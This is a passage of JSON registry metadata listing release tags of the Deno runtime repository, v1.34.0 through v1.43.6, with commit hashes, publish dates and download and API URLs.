ags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"n